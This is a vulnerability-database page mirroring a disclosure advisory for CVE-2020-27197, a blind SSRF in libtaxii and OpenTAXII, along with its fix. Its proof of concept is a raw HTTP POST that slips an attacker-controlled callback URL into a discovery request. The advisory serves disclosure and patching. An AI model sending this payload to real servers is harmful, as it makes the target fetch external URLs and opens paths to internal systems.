Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Libtaxii 1.1.117 / OpenTaxi 0.2.0 Server-Side Request Forgery

🗓️ 21 Oct 2020 00:00:00Reported by Owais MehtabType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 821 Views

Libtaxii & OpenTaxi SSRF issue in versions 1.1.117 & 0.2.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2020-27197
17 Oct 202020:15
attackerkb
Circl		CVE-2020-27197
18 Oct 202000:43
circl
CVE		CVE-2020-27197
17 Oct 202019:19
cve
Cvelist		CVE-2020-27197
17 Oct 202019:19
cvelist
Github Security Blog		libtaxii Server-Side Request Forgery vulnerability
30 Apr 202117:34
github
NVD		CVE-2020-27197
17 Oct 202020:15
nvd
OSV		GHSA-836C-XG97-8P4H libtaxii Server-Side Request Forgery vulnerability
30 Apr 202117:34
osv
OSV		PYSEC-2020-59
17 Oct 202020:15
osv
Prion		Design/Logic Flaw
17 Oct 202020:15
prion
Positive Technologies		PT-2020-16660 · Eclecticiq +2 · Opentaxii +2
17 Oct 202000:00
ptsecurity
Rows per page
`Libtaxii version <= 1.1.117 & OpenTaxi <=0.2.0 Blind SSRF  
  
  
Details  
========================================================================================  
Product:   
Security-Risk: High  
Remote-Exploit: yes  
Vendor-URL: https://github.com/eclecticiq/OpenTAXII , https://github.com/TAXIIProject/libtaxii  
CVE-ID: CVE-2020-27197  
  
  
Credits  
========================================================================================  
Discovered by: Owais Mehtab & Vijay Kota  
Kudos: Sergey Polzunov for finding the root cause and pointing out that the issue with Libtaxii <= 1.1.117  
  
Affected Products:  
========================================================================================  
Libtaxii version <= 1.1.117  
OpenTaxi <=0.2.0  
  
  
Description  
========================================================================================  
While testing opentaxii platform a blind SSRF issue was identified  
  
https://github.com/TAXIIProject/libtaxii/issues/246  
https://github.com/eclecticiq/OpenTAXII/issues/176  
  
Proof of Concept  
========================================================================================  
POST /services/discovery HTTP/1.1  
Host: 127.0.0.1:9000  
Connection: close  
Accept-Encoding: gzip, deflate  
Accept: application/xml  
User-Agent: Cabby 0.1.20  
X-TAXII-Accept: urn:taxii.mitre.org:message:xml:1.1  
X-TAXII-Services: urn:taxii.mitre.org:services:1.1  
X-TAXII-Content-Type: urn:taxii.mitre.org:message:xml:1.1  
X-TAXII-Protocol: urn:taxii.mitre.org:protocol:https:1.0  
Content-Type: application/xml  
Content-Length: XXX  
  
http://burp_collaborator_url?<taxii_11:Discovery_Request xmlns:taxii="http://taxii.mitre.org/messages/taxii_xml_binding-1" xmlns:taxii_11="http://taxii.mitre.org/messages/taxii_xml_binding-1.1" xmlns:tdq="http://taxii.mitre.org/query/taxii_default_query-1" message_id="877a5f67-6616-4040-bbc1-5f36efd5a349"/>  
  
  
  
Solution  
========================================================================================  
Update libtaxii version to 1.1.118  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Oct 2020 00:00Current
EPSS0.0046
libtaxiiopentaxissrfsecurity-riskremote-exploitvendor-urlcve-2020-27197discovery request
821